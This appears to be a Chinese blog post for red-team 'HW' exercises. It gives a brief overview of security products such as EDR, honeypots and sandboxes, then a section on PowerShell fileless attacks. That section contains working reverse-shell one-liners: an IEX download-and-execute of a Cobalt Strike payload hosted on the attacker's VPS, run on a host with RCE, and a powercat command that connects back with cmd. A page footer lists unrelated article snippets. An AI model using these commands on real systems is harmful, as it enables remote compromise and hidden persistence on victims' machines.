2024HW --> 安全产品 Powershell无文件落地攻击

在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)

目录

1.态势感知

2.EDR

3.蜜罐

4.沙箱

5.威胁情报平台

6.Powershell无文件落地攻击!!!


1.态势感知

所谓的态势感知,就是我们在电视剧或者电影中经常见到的大屏幕上的画面(对没错,就是这样,十分的酷炫)

通过态势感知系统,我们可以清晰的看见攻击的来源以及攻击方法以及攻击的时间等等..... 

像深信服的SIP态势感知系统,就是一个很好的态势感知案例(真的一目了然)

其工作原理就是通过在各个子公司,或者办公区的核心交换机上面装一个探针,然后将通过交换机的流量进行copy一份,然后实时传输到态势感知的系统上面,供响应的人员进行查看

大概就是这样

2.EDR

EDR(Endpoint Detection and Response)终端检测与响应分析

这个就是通过在你的办公的电脑上装一个软件,通过这样,将多台设备联合在一起,进行监控和实时探测的目的(难听一点就是监控着你每天在干嘛,有点那个啥的)

通过EDR,我们可以实现监视终端以检测可疑活动,并捕获可疑数据以进行安全取证及调查。

3.蜜罐

随着技术的发展,科技也是越来越成熟,蜜罐也是。(相信是每个黑客最痛恨的了吧)

比较出名的民用的蜜罐就应该是Hfish了吧

这个蜜罐挺厉害的,提供了各种如OA,gitlab,redis,以及一些出名端口如22,3306,7001等诱导黑客来攻击,当黑客攻击的时候,就"中了蜜罐"。

通过蜜罐,我们能获取黑客的IP(一般是代理),0DAY(能获得这个就收获大了),误导黑客的攻击方向,或者延缓他们的攻击脚步,当然了,说不定还能获取他们个人信息如手机号,微信号等等个人隐私(反正蜜罐效果还是不错的)

4.沙箱

这个的作用也很大,在日常生活中我们的好兄弟经常回给我们发一些如1个T的学习资料以及一些好看的东西等等!!

但是我们又不知道有没有病毒,那能怎么办呢??? 沙箱就诞生了

安全沙箱技术是一种用于隔离应用程序或进程的安全机制,它可以在计算机系统中创建一个受限的环境,以防止应用程序或进程对系统造成潜在的安全威胁

通过沙箱,我们可以对这个exe,文件等进行威胁分析,来查看它们是否会产生一些威胁的做法

就像这样

5.威胁情报平台

这个没什么说的,我直接推荐微步好吧(挺出名的)

你有什么子域名啊,ip啊,都可以往上面扔一下,说不定能得到一些对应的信息

好了,那么差不多咯???

不对   不能水文章,还得写点东西

那么就来讲一下一种很酷炫的攻击吧(从名字都知道很酷炫)

6.Powershell无文件落地攻击!!!

是不是听起来就很酷炫,那么下面我们就来讲解一下这个东西

传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件(例如exe)复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的,无文件落地攻击是指即不向磁盘写入可执行文件,而是以脚本形式存在计算机中的注册表子项目中,以此来躲避杀软的检测,那么绕过了传统防病毒(AV)寻找被保存到磁盘上的文件并扫描这些文件以确定它们是否恶意的查杀方法。

对于无文件落地攻击,一般分为以下这么几个步骤

1.远程加载恶意脚本
2.注入内存
3.写入注册表(或者自运行)

然而对于powershell

powershell作为微软windows系统自带的软件包,具有十分强大的功能,越来越多的攻击者选用powershell作为攻击手段。PowerShell的主要作用是从远程位置下载恶意文件到受害者主机中,然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression(-IEX)之类的命令执行恶意文件,PowerShell也可以将远程文件直接下载到受害者主机内存中,然后从内存中执行

首先,我们来讲一下powershell无文件反弹shell

1.CS自带powershell_payload

这个反弹shell还是不错的!!!!

首先我们去生成一段powershell的payload,然后部署在我们自己的VPS

然后传上去,开一个http服务

然后我们去存在RCE的主机上直接执行以下的命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://你公网的ip:公网的端口/powershell.ps1'))"

而且在别人的服务器上面,是不会产生任何的文件的,这样,就能达到了无文件落地攻击的效果

2.NC联动powercat反弹shell

除了上面的做法,我们还可以通过nc来接受反弹的shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 你的公网ip -p 监听的端口 -e cmd

我们就能在公网看见我们的nc的shell了 

如果别人访问不到githu,那么我们最好就是去下载这个ps脚本吗,直接放在服务器上,效果也是一样的

除了以上,我们还有nishang配合powershell反弹shell ,Invoke-PowerShellTcp联动nc反弹shell

            

但是不管怎么样,我们都是通过powershell来实现了无文件落地的攻击的目的!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/815991.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ffmpeg cuda硬件解码后处理使用opengl渲染,全硬件流程

1 ffmpeg 硬件解码 使用硬件解码后不要transfer到内存,使用cuda转化nv12 -> bgr24 转化完毕后cuda里面存了一份bgr24 2 gpumat 和 cuda 互操作 如果需要opencv gpumat直接使用cuda内存,则可以手动构造gpumat 可以使用gpumat的各种函数 uchar3* cu…

6-139 大整数存储-数组

本题要求实现一个函数,实现大整数以整数形式存储。大整数按每4位保存在整数数组中,如果大整数位数不是4的倍数,则将保证低位都按4位一存。如“123456789”保存为1,2345,6789。大整数以字符串形式输入 int convert(char a[],int x[]); 函数接口定义: a 是以字符串形式输…

001vscode为什么设置不了中文?

VSCode中文插件安装 在VSCode中设置中文的首要步骤是安装“Chinese (Simplified) Language Pack for Visual Studio Code”扩展插件。这一过程十分简单,只需打开VSCode,进入扩展市场,搜索“ Chinese (Simplified) Language Pack ”然后点击…

【MATLAB源码-第49期】基于蚁群算法(ACO)算法的栅格路径规划,输出最佳路径图和算法收敛曲线图。

操作环境: MATLAB 2022a 1、算法描述 蚁群算法是一种模拟自然界蚂蚁觅食行为的启发式优化算法。在蚁群系统中,通过模拟蚂蚁之间通过信息素沟通的方式来寻找最短路径。 在栅格路径规划中,蚁群算法的基本步骤如下: 1. 初始化: …

MES实施优势有哪些?MES制造执行系统的主要内容

各个行业之间也开始进入到了激烈的竞争当中,很多企业为了能够有效提升企业竞争力,都会通过提升自身实力的方式来提升竞争力。一些制造业也会在经营过程当中使用到MES系统,那么,mes系统的优势有哪些呢? 1、优化企业现场…

mysql dump导出导入数据

前言 mysqldump是MySQL数据库中一个非常有用的命令行工具,用于备份和还原数据库。它可以将整个数据库或者特定的表导出为一个SQL文件,以便在需要时进行恢复或迁移。 使用mysqldump可以执行以下操作: 备份数据库:可以使用mysqld…

ELK日志分析系统+Filebeat

目录 一、Filebeat介绍 1、Filebeat简介 2、Filebeat的工作方式 3、filebeat工作流程 4、Filebeat的作用 5、filebeat的用途 1.为什么要用filebeat来收集日志?为什么不直接用logstash收集日志? 2.filebeat和logstash的区别 二、部署(ELFK)Fileb…

自动化测试Junit

1.什么是Junit JUint是Java编程语言的单元测试框架,用于编写和运行可重复的自动化测试。 JUnit 促进了“先测试后编码”TDD的理念,强调建立测试数据的一段代码,可以先测试,然后再应用。这个方法就好比“测试一点,编码一…

现在有一个二叉树, 父节点保存子节点字符总长度。

现在有一个二叉树, 父节点保存子节点字符总长度。 typedef struct Node{ char *data; struct Node* left; struct Node* rigth; int length; }Node,*tree; 写一个求substring的功能。 Now, if we call substring with lower idx2 and upper idx7, the first part ca…

【SERVERLESS】AWS Lambda上实操

通过Serverless的发展历程及带给我们的挑战,引出我们改如何改变思路,化繁为简,趋利避害,更好的利用其优势,来释放企业效能,为创造带来无限可能。 一 Serverless概述 无服务器计算近年来与云原生计算都是在…

OSPF星型拓扑和MGRE全连

一,拓扑 二,要求 1,R6为ISP只能配置IP地址,R1-R5的环回为私有网段 2,R1/4/5为全连的MGRE结构,R1/2/3为星型的拓扑结构, 3,R1为中心站点所有私有网段可以互相通讯,私有网段…

antd+vue——datepicker日期控件——禁用日期功能

需求&#xff1a;今天之前的日期禁用 <a-date-pickerv-model.trim"formNE.deliveryTime":disabled-date"disabledDate"valueFormat"YYYY-MM-DD"allowClearstyle"width: 100%" />禁用日期的范围&#xff1a; //时间范围 disab…

第14届java A组蓝桥杯做题记录

A题 特殊日期 package Java14省赛.Java研究生组;import java.time.Year; //特殊判断一下2月份&#xff0c;leaf 为true 1 import java.util.*;import 蓝桥杯.dfs_n皇后; public class 特殊日期 {static int sum(int d){int res 0;while(d > 0){res d % 10;d / 10;}return…

Java GC了解

Jstack找到线程的快照 jvm提供其他命令作用 jps&#xff1a; 虚拟机进程状况工具&#xff0c;类似linux的ps命令 jstat&#xff1a;虚拟机统计信息监视工具&#xff0c;经常看gc情况的会使用到 jinfo: java配置信息工具 jmap&#xff1a; java内存映射工具&#xff0c;dump&am…

微服务篇面试题

1、SpringCloud的组件有哪些&#xff1f; 2、负载均衡如何实现&#xff1f; 3、什么是服务雪崩&#xff1f;怎么解决&#xff1f; 4、项目中有没有做过限流&#xff1f; Tomcat单体可以&#xff0c;分布式不适合 5、解释一下CAP和BASE P&#xff1a;加入node03这边的网络断了&a…

基于PCIe的智能处理系统研究

引言 人工智能是集合众多方向的综合性学科,在诸多应用领域均取得了显著成果。随着航空领域人工智能技术研究的不断深入,面向开放式机载智能交互场景,人工智能的应用可解决诸多问题。例如智能感知、辅助决策等,可利用人工智能算法对多源传感器捕获的海量信息进行快速处理,仅将处…

Go语言异常处理方式

Go 语言没有传统的异常处理机制&#xff0c;如 Java、C 或 Python 中的 try-catch 语句。取而代之&#xff0c;Go 采用了基于返回错误值和 panic/recover 机制的混合模式来进行错误处理。以下是 Go 语言中处理异常&#xff08;或称错误&#xff09;的两种主要方式&#xff1a; …

【8086汇编】汇编语言基础入门

文章目录 一、汇编简介1. 汇编语言的组成2. CPU、寄存器、内存3. CPU对存储器的读写4. 拓展5. 检测6. 解析 二、寄存器1. mov、add命令2. 物理地址3. CS:IP 装段地址和偏移地址3.1 如何改变CS:IP的值 4. 数据段DS:[address]4.1 前置知识&#xff1a;字与字节4.2 DS:[address] 5…

[EFI]Z420电脑 Hackintosh 黑苹果efi引导文件

硬件型号驱动情况主板 Hewlett Packard Z420 Workstation处理器Intel Xeon E5-1650v2已驱动内存8GB 2133MHz DDR4 * 2已驱动硬盘闪迪 1T M.2 NVMe SSD已驱动显卡RX 480已驱动声卡ALC已驱动网卡Intel Ethernet Connection I219-V无线网卡蓝牙博通 BCM94360Z4 已驱动 支持系统版本…

整数在内存中的存储和内存操作函数

目录 整数在内存中的存储1. 整数在内存中的存储2. 大小端字节序和字节序判断2.1 什么是大小端?2.2 为什么有大小端 3. 练习3.1 请简述大端字节序和小端字节序的概念&#xff0c;设计⼀个小程序来判断当前机器的字节序。&#xff08;10分&#xff09;-百度笔试题3.2 练习23.3 练…